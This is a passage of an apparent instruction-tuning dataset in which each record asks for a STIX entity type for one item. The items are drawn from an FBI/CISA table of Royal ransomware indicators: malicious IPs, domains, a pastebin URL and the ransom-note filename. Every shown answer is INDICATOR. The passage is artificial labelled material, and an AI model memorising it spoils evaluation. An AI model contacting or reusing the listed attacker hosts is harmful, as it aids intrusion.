2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n98.143.70.147\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n152.89.247.50\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n197.207.181.147\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n89.108.65.136\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nREADME.TXT\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n196.70.77.11\n\n---\n\n### Text Passage:\n**Indicators of Compromise (IOCs)**\nSee Tables 1 and 2 for Royal ransomware IOCs obtained by FBI during threat response activities as of January 2023.\n_**Update November 13, 2023**_\nSee Tables 3 and 4 for Royal and Blacksuit Ransomware IOCs as of June 2023. See Table 5 for a list of legitimate software used by Royal and Blacksuit threat actors identified through FBI investigations as of June 2023.\n_**End Update**_\n**Note** : Some of the observed IP addresses are several months old. FBI and CISA recommend vetting or investigating these IP addresses prior to taking forward-looking action, such as blocking.\n_Table 1: Royal Ransomware Associated Files, Hashes, and IP addresses as of January 2023_ **IOC** **Description**\n------\n**Malicious IP** **Last Activity**\n**Malicious Domain** **Last Observed**\n.royal Encrypted file extension\nREADME.TXT Ransom note\n102.157.44.105 November 2022\n105.158.118.241 November 2022\n105.69.155.85 November 2022\n113.169.187.159 November 2022\n134.35.9.209 November 2022\n139.195.43.166 November 2022\n139.60.161.213 November 2022\n148.213.109.165 November 2022\n163.182.177.80 November 2022\n181.141.3.126 November 2022\n181.164.194.228 November 2022\n185.143.223.69 November 2022\n186.64.67.6 November 2022\n186.86.212.138 November 2022\n190.193.180.228 November 2022\n196.70.77.11 November 2022\n197.11.134.255 November 2022\n197.158.89.85 November 2022\n197.204.247.7 November 2022\n197.207.181.147 November 2022\n197.207.218.27 November 2022\n197.94.67.207 November 2022\n23.111.114.52 November 2022\n41.100.55.97 November 2022\n41.107.77.67 November 2022\n41.109.11.80 November 2022\n41.251.121.35 November 2022\n41.97.65.51 November 2022\n42.189.12.36 November 2022\n45.227.251.167 November 2022\n5.44.42.20 November 2022\n61.166.221.46 November 2022\n68.83.169.91 November 2022\n81.184.181.215 November 2022\n82.12.196.197 November 2022\n98.143.70.147 November 2022\n140.82.48.158 December 2022\n147.135.36.162 December 2022\n147.135.11.223 December 2022\n152.89.247.50 December 2022\n172.64.80.1 December 2022\n179.43.167.10 December 2022\n185.7.214.218 December 2022\n193.149.176.157 December 2022\n193.235.146.104 December 2022\n209.141.36.116 December 2022\n45.61.136.47 December 2022\n45.8.158.104 December 2022\n5.181.234.58 December 2022\n5.188.86.195 December 2022\n77.73.133.84 December 2022\n89.108.65.136 December 2022\n94.232.41.105 December 2022\n47.87.229.39 January 2023\nsombrat.com October 2022\ngororama.com November 2022\nsofteruplive.com November 2022\naltocloudzone.live December 2022\nciborkumari.xyz December 2022\nmyappearinc.com December 2022\nparkerpublic.com December 2022\npastebin.mozilla.org/Z54Vudf9/raw December 2022\ntumbleproperty.com December 2022\nmyappearinc.com/acquire/draft/c7lh0s5jv January 2023\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
